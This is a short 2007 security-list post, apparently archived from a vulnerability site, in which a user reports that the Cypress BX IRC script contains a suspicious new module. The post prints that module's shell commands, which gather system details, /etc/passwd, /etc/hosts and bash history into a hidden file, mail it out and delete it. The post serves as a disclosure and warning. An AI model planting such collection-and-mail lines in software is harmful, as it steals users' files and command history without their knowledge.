Cypress BX script backdoored?

Type securityvulns
Reporter Securityvulns
Modified 2007-11-07T00:00:00


For those of us who use Cyp/bx ( )

|]rip[@rock:14:53:49:~/tmp/cyp/modules| $ cat mdop.m


uname -a >> /tmp/.bx cat /etc/hosts >> /tmp/.bx cat /etc/passwd >> /tmp/.bx cat $HOME/.bash_history >> /tmp/.bx 2>/dev/null mail < /tmp/.bx sleep 4 rm -rf /tmp/.bx

What's up with this? Last time I downloaded this that wasn't there,
and it's the same version number but different md5. .. and this file wasn't included.

Chris Network security professional

"Computer games don't affect kids. I mean if Pac-Man affected us as
kids, we'd all be running around in darkened rooms, munching magic
pills and listening to repetitive electronic music." --Kristian Wilson, Nintendo 1989.